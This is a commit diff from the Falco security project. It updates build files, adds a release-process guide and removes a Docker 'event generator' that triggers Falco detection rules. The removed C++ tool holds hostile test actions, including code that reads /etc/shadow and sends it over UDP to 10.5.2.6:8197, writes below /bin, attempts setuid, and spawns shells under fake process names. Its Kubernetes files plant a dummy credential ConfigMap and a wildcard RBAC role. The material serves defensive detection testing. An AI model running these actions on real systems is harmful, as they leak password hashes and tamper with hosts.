Update build/init.sh

Co-authored-by: Grzegorz Nosek <grzegorz.nosek@sysdig.com>

.gitignore

@@ -16,12 +16,6 @@ userspace/falco/lua/lpeg.so
 userspace/engine/lua/lyaml
 userspace/engine/lua/lyaml.lua
 
-docker/event-generator/event_generator
-docker/event-generator/mysqld
-docker/event-generator/httpd
-docker/event-generator/sha1sum
-docker/event-generator/vipw
-
 .vscode/*
 
 .luacheckcache

CMakeLists.txt

@@ -71,9 +71,9 @@ set(CMAKE_CXX_FLAGS_RELEASE "-O3 -fno-strict-aliasing -DNDEBUG")
 include(GetFalcoVersion)
 
 set(PACKAGE_NAME "falco")
-set(PROBE_NAME "falco-probe")
+set(PROBE_NAME "falco")
 set(PROBE_DEVICE_NAME "falco")
-set(DRIVER_LOOKUP_URL "https://s3.amazonaws.com/download.draios.com")
+set(DRIVERS_REPO "https://dl.bintray.com/falcosecurity/driver")
 if(CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT)
   set(CMAKE_INSTALL_PREFIX
       /usr

RELEASE.md

@@ -0,0 +1,79 @@
+# Falco Release Process
+
+Our release process is mostly automated, but we still need some manual steps to initiate and complete it.
+
+Changes and new features are grouped in [milestones](https://github.com/falcosecurity/falco/milestones), the milestone with the next version represents what is going to be released. 
+
+Releases happen on a monthly cadence, towards the 16th of the on-going month, and we need to assign owners for each (usually we pair a new person with an experienced one). Assignees and the due date are proposed during the [weekly community call](https://github.com/falcosecurity/community). Note that hotfix releases can happen as soon as it is needed.
+
+Finally, on the proposed due date the assignees for the upcoming release proceed with the processes described below.
+
+## Pre-Release Checklist
+
+### 1. Release notes
+- Let `YYYY-MM-DD` the day before of the [latest release](https://github.com/falcosecurity/falco/releases)
+- Check the release note block of every PR matching the `is:pr is:merged closed:>YYY-MM-DD` [filter](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+closed%3A%3EYYYY-MM-DD)
+    - Ensure the release note block follows the [commit convention](https://github.com/falcosecurity/falco/blob/master/CONTRIBUTING.md#commit-convention), otherwise fix its content
+    - If the PR has no milestone, assign it to the milestone currently undergoing release
+- Check issues without a milestone (using [is:pr is:merged no:milestone closed:>YYYT-MM-DD](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD) filter) and add them to the milestone currently undergoing release
+- Double-check that there are no more merged PRs without the target milestone assigned with the `is:pr is:merged no:milestone closed:>YYYT-MM-DD` [filters](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYT-MM-DD), if any, fix them
+
+### 2. Milestones
+- Move the [tasks not completed](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Aopen) to a new minor milestone
+- Close the completed milestone
+    
+### 3. Release PR
+
+- Double-check if any hard-coded version number is present in the code, it should be not present anywhere:
+    - If any, manually correct it then open an issue to automate version number bumping later
+    - Versions table in the `README.md` update itself automatically
+- Generate the change log https://github.com/leodido/rn2md, or https://fs.fntlnz.wtf/falco/milestones-changelog.txt for the lazy people (it updates every 5 minutes) 
+- Add the lastest changes on top the previous `CHANGELOG.md`
+- Submit a PR with the above modifications
+- Await PR approval
+
+## Release
+
+Let `x.y.z` the new version.
+
+### 1. Create a tag
+
+- Once the release PR has got merged, and the CI has done its job on the master, git tag the new release
+
+    ```
+    git pull
+    git checkout master
+    git tag x.y.z
+    git push origin x.y.z
+    ```
+
+> **N.B.**: do NOT use an annotated tag
+
+- Wait for the CI to complete
+
+### 2. Update the GitHub release
+- [Draft a new release](https://github.com/falcosecurity/falco/releases/new)
+- Use `x.y.z` both as tag version and release title
+- Use the following template to fill the release description:
+    ```
+    <!-- Copy the relevant part of the changelog here -->
+
+    ### Statistics
+
+    | Merged PRs        | Number  |
+    |-------------------|---------|
+    | Not user-facing   | x       |
+    | Release note      | x       |
+    | Total             | x       |
+
+    <!-- Calculate stats and fill the above table -->
+    ```
+
+- Finally, publish the release!
+
+## Post-Release tasks
+
+Announce the new release to the world!
+
+- Send an announcement to cncf-falco-dev@lists.cncf.io (plain text, please)
+- Let folks in the slack #falco channel know about a new release came out

build/README.md

@@ -0,0 +1,13 @@
+# Build Directory
+
+This is a special directory that is used to compile Falco.
+The flags and their options are defined in `init.sh`.
+Please edit `init.sh` to your liking.
+
+Then build Falco from this directory.
+
+```
+./init.sh
+make all
+```
+

build/init.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+#
+# Copyright (C) 2019 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+cmake ../ \
+      -DBUILD_BPF=OFF \
+      -DBUILD_WARNINGS_AS_ERRORS="OFF" \
+      -DCMAKE_BUILD_TYPE="Release" \
+      -DCMAKE_INSTALL_PREFIX="/usr" \
+      -DFALCO_ETC_DIR="/etc/falco" \
+      -DUSE_BUNDLED_DEPS=OFF

cmake/modules/DownloadCatch.cmake

@@ -14,8 +14,8 @@ include(ExternalProject)
 
 set(CATCH2_INCLUDE ${CMAKE_BINARY_DIR}/catch2-prefix/include)
 
-set(CATCH_EXTERNAL_URL URL https://github.com/catchorg/catch2/archive/v2.9.1.tar.gz URL_HASH
-                       SHA256=0b36488aca6265e7be14da2c2d0c748b4ddb9c70a1ea4da75736699c629f14ac)
+set(CATCH_EXTERNAL_URL URL https://github.com/catchorg/catch2/archive/v2.12.1.tar.gz URL_HASH
+                       SHA256=e5635c082282ea518a8dd7ee89796c8026af8ea9068cd7402fb1615deacd91c3)
 
 ExternalProject_Add(
   catch2

cmake/modules/gRPC.cmake

@@ -42,6 +42,15 @@ if(NOT USE_BUNDLED_DEPS)
     message(FATAL_ERROR "Couldn't find system protobuf")
   endif()
 
+  # gpr
+  find_library(GPR_LIB NAMES gpr)
+
+  if(GPR_LIB)
+    message(STATUS "Found gpr lib: ${GPR_LIB}")
+  else()
+    message(FATAL_ERROR "Couldn't find system gpr")
+  endif()
+
   # gRPC todo(fntlnz, leodido): check that gRPC version is greater or equal than 1.8.0
   find_path(GRPCXX_INCLUDE NAMES grpc++/grpc++.h)
   if(GRPCXX_INCLUDE)

cmake/modules/sysdig.cmake

@@ -26,8 +26,8 @@ file(MAKE_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
 # To update sysdig version for the next release, change the default below
 # In case you want to test against another sysdig version just pass the variable - ie., `cmake -DSYSDIG_VERSION=dev ..`
 if(NOT SYSDIG_VERSION)
-  set(SYSDIG_VERSION "a259b4bf49c3330d9ad6c3eed9eb1a31954259a6")
-  set(SYSDIG_CHECKSUM "SHA256=fdbeb8d182e6383fe89428e0934d521636068f62109c1b3ca11689d886458284")
+  set(SYSDIG_VERSION "47374b2b73734d509f3c99890c80be5242021c3d")
+  set(SYSDIG_CHECKSUM "SHA256=df73b5c69eca8880e30c618dc47b995140286b47fa845c97a3d7a6ddb2d6f1b1")
 endif()
 set(PROBE_VERSION "${SYSDIG_VERSION}")
 

docker/README.md

@@ -1,6 +1,6 @@
 # Falco Dockerfiles
 
-This directory contains the various ways to package Falco as a container. 
+This directory contains various ways to package Falco as a container. 
 
 ## Currently Supported Images
 
@@ -9,7 +9,6 @@ This directory contains the various ways to package Falco as a container.
 | [falcosecurity/falco:latest](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/stable | Falco (DEB built from git tag or from the master) with all the building toolchain. | 
 | [falcosecurity/falco:latest-slim](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master-slim](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/slim | Falco (DEB build from git tag or from the master) without the building toolchain. | 
 | [falcosecurity/falco:latest-minimal](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master-minimal](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/minimal | Falco (TGZ built from git tag or from the master) without the building toolchain. | 
-| [falcosecurity/falco-event-generator:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-event-generator) | docker/event-generator | Event generator tool to simulate events Falco catches. | 
 | [falcosecurity/falco-builder:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-builder) | docker/builder | The complete build tool chain for compiling Falco from source. See [the documentation](https://falco.org/docs/source/) for more details on building from source. Used to build Falco (CI). | 
 | [falcosecurity/falco-tester:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-tester) | docker/tester | Container image for running the Falco test suite. Used to run Falco integration tests (CI). | 
 | _to not be published_ | docker/local | Built on-the-fly and used by falco-tester. |

docker/event-generator/Dockerfile

@@ -1,10 +0,0 @@
-FROM alpine:latest
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
-RUN apk add --no-cache bash g++ curl
-COPY ./event_generator.cpp /usr/local/bin
-COPY ./docker-entrypoint.sh ./k8s_event_generator.sh /
-COPY ./yaml /yaml
-RUN mkdir -p /var/lib/rpm
-RUN g++ --std=c++0x /usr/local/bin/event_generator.cpp -o /usr/local/bin/event_generator
-RUN curl -o /usr/local/bin/kubectl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl && chmod +x /usr/local/bin/kubectl
-ENTRYPOINT ["/docker-entrypoint.sh"]

docker/event-generator/Makefile

@@ -1,18 +0,0 @@
-#
-# Copyright (C) 2019 The Falco Authors.
-#
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-image:
-	docker build -t sysdig/falco-event-generator:latest .

docker/event-generator/docker-entrypoint.sh

@@ -1,21 +0,0 @@
-#!/bin/bash
-
-CMD=${1:-syscall}
-
-shift
-
-set -euo pipefail
-
-if [[ "$CMD" == "syscall" ]]; then
-    /usr/local/bin/event_generator
-elif [[ "$CMD" == "k8s_audit" ]]; then
-    . k8s_event_generator.sh
-elif [[ "$CMD" == "bash" ]]; then
-    bash
-else
-    echo "Unknown command. Can be one of"
-    echo "   \"syscall\": generate falco syscall-related activity"
-    echo "   \"k8s_audit\": generate falco k8s audit-related activity"
-    echo "   \"bash\": spawn a shell"
-    exit 1
-fi

docker/event-generator/event-generator-k8saudit-deployment.yaml

@@ -1,23 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: falco-event-generator-k8saudit
-  labels:
-    app: falco-event-generator-k8saudit
-  namespace: falco-event-generator
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app: falco-event-generator-k8saudit
-  template:
-    metadata:
-      labels:
-        app: falco-event-generator-k8saudit
-    spec:
-      serviceAccount: falco-event-generator
-      containers:
-      - name: falco-event-generator
-        image: falcosecurity/falco-event-generator
-        imagePullPolicy: Always
-        args: ["k8s_audit"]

docker/event-generator/event-generator-role-rolebinding-serviceaccount.yaml

@@ -1,71 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: falco-event-generator
-rules:
-- apiGroups:
-  - ""
-  resources:
-  - configmaps
-  - services
-  - serviceaccounts
-  - pods
-  verbs:
-  - list
-  - get
-  - create
-  - delete
-- apiGroups:
-  - apps
-  - extensions
-  resources:
-  - deployments
-  verbs:
-  - list
-  - get
-  - create
-  - delete
-- apiGroups:
-  - rbac.authorization.k8s.io
-  resources:
-  - roles
-  - rolebindings
-  verbs:
-  - get
-  - list
-  - create
-  - delete
-# These are only so the event generator can create roles that have these properties.
-# It will result in a falco alert for the rules "ClusterRole With Wildcard Created", "ClusterRole With Pod Exec Created"
-- apiGroups:
-  - ""
-  resources:
-  - pods/exec
-  verbs:
-  - get
-- apiGroups:
-  - ""
-  resources:
-  - '*'
-  verbs:
-  - get
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: RoleBinding
-metadata:
-  name: falco-event-generator
-  namespace: falco-eg-sandbox
-subjects:
-  - kind: ServiceAccount
-    name: falco-event-generator
-    namespace: falco-event-generator
-roleRef:
-  kind: ClusterRole
-  name: falco-event-generator
-  apiGroup: rbac.authorization.k8s.io
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: falco-event-generator
-  namespace: falco-event-generator

docker/event-generator/event-generator-syscall-daemonset.yaml

@@ -1,20 +0,0 @@
-apiVersion: apps/v1
-kind: DaemonSet
-metadata:
-  name: falco-event-generator-syscall
-  labels:
-    app: falco-event-generator-syscall
-  namespace: falco-event-generator
-spec:
-  selector:
-    matchLabels:
-      name: falco-event-generator-syscall
-  template:
-    metadata:
-      labels:
-        name: falco-event-generator-syscall
-    spec:
-      containers:
-      - name: falco-event-generator
-        image: falcosecurity/falco-event-generator
-        args: ["syscall"]

docker/event-generator/event_generator.cpp

@@ -1,535 +0,0 @@
-/*
-Copyright (C) 2019 The Falco Authors.
-
-Licensed under the Apache License, Version 2.0 (the "License");
-you may not use this file except in compliance with the License.
-You may obtain a copy of the License at
-
-    http://www.apache.org/licenses/LICENSE-2.0
-
-Unless required by applicable law or agreed to in writing, software
-distributed under the License is distributed on an "AS IS" BASIS,
-WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-See the License for the specific language governing permissions and
-limitations under the License.
-*/
-
-#include <cstdio>
-#include <utility>
-#include <map>
-#include <set>
-#include <string>
-#include <fstream>
-#include <sstream>
-#include <cstring>
-#include <cstdlib>
-#include <unistd.h>
-#include <getopt.h>
-#include <errno.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <sys/wait.h>
-#include <pwd.h>
-#include <sys/socket.h>
-#include <arpa/inet.h>
-
-using namespace std;
-
-void usage(char *program)
-{
-	printf("Usage %s [options]\n\n", program);
-	printf("Options:\n");
-	printf("     -h/--help: show this help\n");
-	printf("     -a/--action: actions to perform. Can be one of the following:\n");
-	printf("          write_binary_dir                           Write to files below /bin\n");
-	printf("          write_etc                                  Write to files below /etc\n");
-	printf("          read_sensitive_file                        Read a sensitive file\n");
-	printf("          read_sensitive_file_after_startup          As a trusted program, wait a while,\n");
-	printf("                                                     then read a sensitive file\n");
-	printf("          write_rpm_database                         Write to files below /var/lib/rpm\n");
-	printf("          spawn_shell                                Run a shell (bash)\n");
-	printf("                                                     Used by spawn_shell_under_httpd below\n");
-	printf("          spawn_shell_under_httpd                    Run a shell (bash) under a httpd process\n");
-	printf("          db_program_spawn_process                   As a database program, try to spawn\n");
-	printf("                                                     another program\n");
-	printf("          modify_binary_dirs                         Modify a file below /bin\n");
-	printf("          mkdir_binary_dirs                          Create a directory below /bin\n");
-	printf("          change_thread_namespace                    Change namespace\n");
-	printf("          system_user_interactive                    Change to a system user and try to\n");
-	printf("                                                     run an interactive command\n");
-	printf("          network_activity                           Open network connections\n");
-	printf("                                                     (used by system_procs_network_activity below)\n");
-	printf("          system_procs_network_activity              Open network connections as a program\n");
-	printf("                                                     that should not perform network actions\n");
-	printf("          non_sudo_setuid                            Setuid as a non-root user\n");
-	printf("          create_files_below_dev                     Create files below /dev\n");
-	printf("          exec_ls                                    execve() the program ls\n");
-	printf("                                                     (used by user_mgmt_binaries, db_program_spawn_process)\n");
-	printf("          user_mgmt_binaries                         Become the program \"vipw\", which triggers\n");
-	printf("                                                     rules related to user management programs\n");
-	printf("          exfiltration                               Read /etc/shadow and send it via udp to a\n");
-	printf("                                                     specific address and port\n");
-	printf("          all                                        All of the above\n");
-	printf("       The action can also be specified via the environment variable EVENT_GENERATOR_ACTIONS\n");
-	printf("           as a colon-separated list\n");
-	printf("       if specified, -a/--action overrides any environment variables\n");
-	printf("     -i/--interval: Number of seconds between actions\n");
-	printf("     -o/--once: Perform actions once and exit\n");
-}
-
-void open_file(const char *filename, const char *flags)
-{
-	FILE *f = fopen(filename, flags);
-	if(f)
-	{
-		fclose(f);
-	}
-	else
-	{
-		fprintf(stderr, "Could not open %s for writing: %s\n", filename, strerror(errno));
-	}
-}
-
-void exfiltration()
-{
-	ifstream shadow;
-
-	shadow.open("/etc/shadow");
-
-	printf("Reading /etc/shadow and sending to 10.5.2.6:8197...\n");
-
-	if(!shadow.is_open())
-	{
-		fprintf(stderr, "Could not open /etc/shadow for reading: %s", strerror(errno));
-		return;
-	}
-
-	string line;
-	string shadow_contents;
-	while(getline(shadow, line))
-	{
-		shadow_contents += line;
-		shadow_contents += "\n";
-	}
-
-	int rc;
-	ssize_t sent;
-	int sock = socket(PF_INET, SOCK_DGRAM, 0);
-	struct sockaddr_in dest;
-
-	dest.sin_family = AF_INET;
-	dest.sin_port = htons(8197);
-	inet_aton("10.5.2.6", &(dest.sin_addr));
-
-	if((rc = connect(sock, (struct sockaddr *)&dest, sizeof(dest))) != 0)
-	{
-		fprintf(stderr, "Could not bind listening socket to dest: %s\n", strerror(errno));
-		return;
-	}
-
-	if((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size())
-	{
-		fprintf(stderr, "Could not send shadow contents via udp datagram: %s\n", strerror(errno));
-		return;
-	}
-
-	close(sock);
-}
-
-void touch(const char *filename)
-{
-	open_file(filename, "w");
-}
-
-void read(const char *filename)
-{
-	open_file(filename, "r");
-}
-
-void become_user(const char *user)
-{
-	struct passwd *pw;
-	pw = getpwnam(user);
-	if(pw == NULL)
-	{
-		fprintf(stderr, "Could not find user information for \"%s\" user: %s\n", user, strerror(errno));
-		exit(1);
-	}
-
-	int rc = setuid(pw->pw_uid);
-
-	if(rc != 0)
-	{
-		fprintf(stderr, "Could not change user to \"%s\" (uid %u): %s\n", user, pw->pw_uid, strerror(errno));
-		exit(1);
-	}
-}
-
-void spawn(const char *cmd, char **argv, char **env)
-{
-	pid_t child;
-
-	// Fork a process, that way proc.duration is reset
-	if((child = fork()) == 0)
-	{
-		execve(cmd, argv, env);
-		fprintf(stderr, "Could not exec to spawn %s: %s\n", cmd, strerror(errno));
-	}
-	else
-	{
-		int status;
-		waitpid(child, &status, 0);
-	}
-}
-
-void respawn(const char *cmd, const char *action, const char *interval)
-{
-	char *argv[] = {(char *)cmd,
-			(char *)"--action", (char *)action,
-			(char *)"--interval", (char *)interval,
-			(char *)"--once", NULL};
-
-	char *env[] = {NULL};
-
-	spawn(cmd, argv, env);
-}
-
-void write_binary_dir()
-{
-	printf("Writing to /bin/created-by-event-generator-sh...\n");
-	touch("/bin/created-by-event-generator-sh");
-}
-
-void write_etc()
-{
-	printf("Writing to /etc/created-by-event-generator-sh...\n");
-	touch("/etc/created-by-event-generator-sh");
-}
-
-void read_sensitive_file()
-{
-	printf("Reading /etc/shadow...\n");
-	read("/etc/shadow");
-}
-
-void read_sensitive_file_after_startup()
-{
-	printf("Becoming the program \"httpd\", sleeping 6 seconds and reading /etc/shadow...\n");
-	respawn("./httpd", "read_sensitive_file", "6");
-}
-
-void write_rpm_database()
-{
-	printf("Writing to /var/lib/rpm/created-by-event-generator-sh...\n");
-	touch("/var/lib/rpm/created-by-event-generator-sh");
-}
-
-void spawn_shell()
-{
-	printf("Spawning a shell to run \"ls > /dev/null\" using system()...\n");
-	int rc;
-
-	if((rc = system("ls > /dev/null")) != 0)
-	{
-		fprintf(stderr, "Could not run ls > /dev/null in a shell: %s\n", strerror(errno));
-	}
-}
-
-void spawn_shell_under_httpd()
-{
-	printf("Becoming the program \"httpd\" and then spawning a shell\n");
-	respawn("./httpd", "spawn_shell", "0");
-}
-
-void db_program_spawn_process()
-{
-	printf("Becoming the program \"mysql\" and then running ls\n");
-	respawn("./mysqld", "exec_ls", "0");
-}
-
-void modify_binary_dirs()
-{
-	printf("Moving /bin/true to /bin/true.event-generator-sh and back...\n");
-
-	if(rename("/bin/true", "/bin/true.event-generator-sh") != 0)
-	{
-		fprintf(stderr, "Could not rename \"/bin/true\" to \"/bin/true.event-generator-sh\": %s\n", strerror(errno));
-	}
-	else
-	{
-		if(rename("/bin/true.event-generator-sh", "/bin/true") != 0)
-		{
-			fprintf(stderr, "Could not rename \"/bin/true.event-generator-sh\" to \"/bin/true\": %s\n", strerror(errno));
-		}
-	}
-}
-
-void mkdir_binary_dirs()
-{
-	printf("Creating directory /bin/directory-created-by-event-generator-sh...\n");
-	if(mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0)
-	{
-		fprintf(stderr, "Could not create directory \"/bin/directory-created-by-event-generator-sh\": %s\n", strerror(errno));
-	}
-}
-
-void change_thread_namespace()
-{
-	printf("Calling setns() to change namespaces...\n");
-	printf("NOTE: does not result in a falco notification in containers, unless container run with --privileged or --security-opt seccomp=unconfined\n");
-	// It doesn't matter that the arguments to setns are
-	// bogus. It's the attempt to call it that will trigger the
-	// rule.
-	setns(0, 0);
-}
-
-void system_user_interactive()
-{
-	pid_t child;
-
-	printf("Forking a child that becomes user=daemon and then tries to run /bin/login...\n");
-	// Fork a child and do everything in the child.
-	if((child = fork()) == 0)
-	{
-		become_user("daemon");
-		char *argv[] = {(char *)"/bin/login", NULL};
-		char *env[] = {NULL};
-		spawn("/bin/login", argv, env);
-		exit(0);
-	}
-	else
-	{
-		int status;
-		waitpid(child, &status, 0);
-	}
-}
-
-void network_activity()
-{
-	printf("Connecting a udp socket to 10.2.3.4:8192...\n");
-	int rc;
-	int sock = socket(PF_INET, SOCK_DGRAM, 0);
-	struct sockaddr_in localhost;
-
-	localhost.sin_family = AF_INET;
-	localhost.sin_port = htons(8192);
-	inet_aton("10.2.3.4", &(localhost.sin_addr));
-
-	if((rc = connect(sock, (struct sockaddr *)&localhost, sizeof(localhost))) != 0)
-	{
-		fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno));
-		return;
-	}
-
-	close(sock);
-}
-
-void system_procs_network_activity()
-{
-	printf("Becoming the program \"sha1sum\" and then performing network activity\n");
-	respawn("./sha1sum", "network_activity", "0");
-}
-
-void non_sudo_setuid()
-{
-	pid_t child;
-
-	printf("Forking a child that becomes \"daemon\" user and then \"root\"...\n");
-
-	// Fork a child and do everything in the child.
-	if((child = fork()) == 0)
-	{
-		// First setuid to something non-root. Then try to setuid back to root.
-		become_user("daemon");
-		become_user("root");
-		exit(0);
-	}
-	else
-	{
-		int status;
-		waitpid(child, &status, 0);
-	}
-}
-
-void create_files_below_dev()
-{
-	printf("Creating /dev/created-by-event-generator-sh...\n");
-	touch("/dev/created-by-event-generator-sh");
-}
-
-void exec_ls()
-{
-	char *argv[] = {(char *)"/bin/ls", NULL};
-	char *env[] = {NULL};
-	spawn("/bin/ls", argv, env);
-}
-
-void user_mgmt_binaries()
-{
-	printf("Becoming the program \"vipw\" and then running the program /bin/ls\n");
-	printf("NOTE: does not result in a falco notification in containers\n");
-	respawn("./vipw", "exec_ls", "0");
-}
-
-typedef void (*action_t)();
-
-map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
-					 {"write_etc", write_etc},
-					 {"read_sensitive_file", read_sensitive_file},
-					 {"read_sensitive_file_after_startup", read_sensitive_file_after_startup},
-					 {"write_rpm_database", write_rpm_database},
-					 {"spawn_shell", spawn_shell},
-					 {"spawn_shell_under_httpd", spawn_shell_under_httpd},
-					 {"db_program_spawn_process", db_program_spawn_process},
-					 {"modify_binary_dirs", modify_binary_dirs},
-					 {"mkdir_binary_dirs", mkdir_binary_dirs},
-					 {"change_thread_namespace", change_thread_namespace},
-					 {"system_user_interactive", system_user_interactive},
-					 {"network_activity", network_activity},
-					 {"system_procs_network_activity", system_procs_network_activity},
-					 {"non_sudo_setuid", non_sudo_setuid},
-					 {"create_files_below_dev", create_files_below_dev},
-					 {"exec_ls", exec_ls},
-					 {"user_mgmt_binaries", user_mgmt_binaries},
-					 {"exfiltration", exfiltration}};
-
-// Some actions don't directly result in suspicious behavior. These
-// actions are excluded from the ones run with -a all.
-set<string> exclude_from_all_actions = {"spawn_shell", "exec_ls", "network_activity"};
-
-void create_symlinks(const char *program)
-{
-	int rc;
-
-	// Some actions depend on this program being re-run as
-	// different program names like 'mysqld', 'httpd', etc. This
-	// sets up all the required symlinks.
-	const char *progs[] = {"./httpd", "./mysqld", "./sha1sum", "./vipw", NULL};
-
-	for(unsigned int i = 0; progs[i] != NULL; i++)
-	{
-		unlink(progs[i]);
-
-		if((rc = symlink(program, progs[i])) != 0)
-		{
-			fprintf(stderr, "Could not link \"./event_generator\" to \"%s\": %s\n", progs[i], strerror(errno));
-		}
-	}
-}
-
-void run_actions(map<string, action_t> &actions, int interval, bool once)
-{
-	while(true)
-	{
-		for(auto action : actions)
-		{
-			printf("***Action %s\n", action.first.c_str());
-			action.second();
-			sleep(interval);
-		}
-		if(once)
-		{
-			break;
-		}
-	}
-}
-
-int main(int argc, char **argv)
-{
-	map<string, action_t> actions;
-	int op;
-	int long_index = 0;
-	int interval = 1;
-	bool once = false;
-	map<string, action_t>::iterator it;
-
-	static struct option long_options[] =
-		{
-			{"help", no_argument, 0, 'h'},
-			{"action", required_argument, 0, 'a'},
-			{"interval", required_argument, 0, 'i'},
-			{"once", no_argument, 0, 'o'},
-
-			{0, 0}};
-
-	//
-	// Parse the args
-	//
-	while((op = getopt_long(argc, argv,
-				"ha:i:l:o",
-				long_options, &long_index)) != -1)
-	{
-		switch(op)
-		{
-		case 'h':
-			usage(argv[0]);
-			exit(1);
-		case 'a':
-			// "all" is already implied
-			if(strcmp(optarg, "all") != 0)
-			{
-				if((it = defined_actions.find(optarg)) == defined_actions.end())
-				{
-					fprintf(stderr, "No action with name \"%s\" known, exiting.\n", optarg);
-					exit(1);
-				}
-				actions.insert(*it);
-			}
-			break;
-		case 'i':
-			interval = atoi(optarg);
-			break;
-		case 'o':
-			once = true;
-			break;
-		default:
-			usage(argv[0]);
-			exit(1);
-		}
-	}
-
-	//
-	// Also look for actions in the environment. If specified, they
-	// override any specified on the command line.
-	//
-	char *env_action = getenv("EVENT_GENERATOR_ACTIONS");
-
-	if(env_action)
-	{
-		actions.clear();
-
-		string envs(env_action);
-		istringstream ss(envs);
-		string item;
-		while(std::getline(ss, item, ':'))
-		{
-			if((it = defined_actions.find(item)) == defined_actions.end())
-			{
-				fprintf(stderr, "No action with name \"%s\" known, exiting.\n", item.c_str());
-				exit(1);
-			}
-			actions.insert(*it);
-		}
-	}
-
-	if(actions.size() == 0)
-	{
-		for(auto &act : defined_actions)
-		{
-			if(exclude_from_all_actions.find(act.first) == exclude_from_all_actions.end())
-			{
-				actions.insert(act);
-			}
-		}
-	}
-
-	setvbuf(stdout, NULL, _IONBF, 0);
-	setvbuf(stderr, NULL, _IONBF, 0);
-	// Only create symlinks when running as the program event_generator
-	if(strstr(argv[0], "generator"))
-	{
-		create_symlinks(argv[0]);
-	}
-
-	run_actions(actions, interval, once);
-}

docker/event-generator/k8s_event_generator.sh

@@ -1,60 +0,0 @@
-#!/bin/bash
-
-set -euo pipefail
-
-# You can pass a specific falco rule name and only yaml files matching
-# that rule will be considered. The default is "all", meaning all yaml
-# files will be applied.
-
-RULE=${1:-all}
-
-# Replace any '/' in RULES with a '.' and any space with a dash. (K8s
-# label values can not contain slashes/spaces)
-RULE=$(echo "$RULE" | tr '/ ' '.-')
-
-echo "***Testing kubectl configuration..."
-kubectl version --short
-
-while true; do
-
-    # Delete all resources in the falco-eg-sandbox namespace
-    echo "***Deleting all resources in falco-eg-sandbox namespace..."
-    kubectl delete --all configmaps -n falco-eg-sandbox
-    kubectl delete --all deployments -n falco-eg-sandbox
-    kubectl delete --all services -n falco-eg-sandbox
-    kubectl delete --all roles -n falco-eg-sandbox
-    kubectl delete --all serviceaccounts -n falco-eg-sandbox
-
-    # We don't delete all rolebindings in the falco-eg-sandbox
-    # namespace, as that would also delete the rolebinding for the
-    # event generator itself.
-    kubectl delete rolebinding vanilla-role-binding -n falco-eg-sandbox || true
-
-    for file in yaml/*.yaml; do
-
-	MATCH=0
-	if [[ "${RULE}" == "all" ]]; then
-	    MATCH=1
-	else
-	    RET=$(grep -E "falco.rules:.*${RULE}" $file || true)
-	    if [[ "$RET" != "" ]]; then
-		MATCH=1
-	    fi
-	fi
-
-	if [[ $MATCH == 1 ]]; then
-	    MESSAGES=$(grep -E 'message' $file | cut -d: -f2 | tr '\n' ',')
-	    RULES=$(grep -E 'falco.rules' $file | cut -d: -f2 | tr '\n' ',')
-
-	    # The message uses dashes in place of spaces, convert them back to spaces
-	    MESSAGES=$(echo "$MESSAGES" | tr '-' ' ' | sed -e 's/ *//' | sed  -e 's/,$//')
-	    RULES=$(echo "$RULES" | tr '-' ' '| tr '.' '/' | sed -e 's/ *//' | sed  -e 's/,$//')
-
-	    echo "***$MESSAGES (Rule(s) $RULES)..."
-	    kubectl apply -f $file -n falco-eg-sandbox
-	    sleep 2
-	fi
-    done
-
-    sleep 10
-done

docker/event-generator/yaml/configmap-private-creds.yaml

@@ -1,15 +0,0 @@
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: private-creds-configmap
-  labels:
-    app.kubernetes.io/name: private-creds-configmap
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create.Modify-Configmap-With-Private-Credentials
-    message: Creating-configmap-with-private-credentials
-data:
-  ui.properties: |
-    color.good=purple
-    color.bad=yellow
-    allow.textmode=true
-    password=some_secret_password

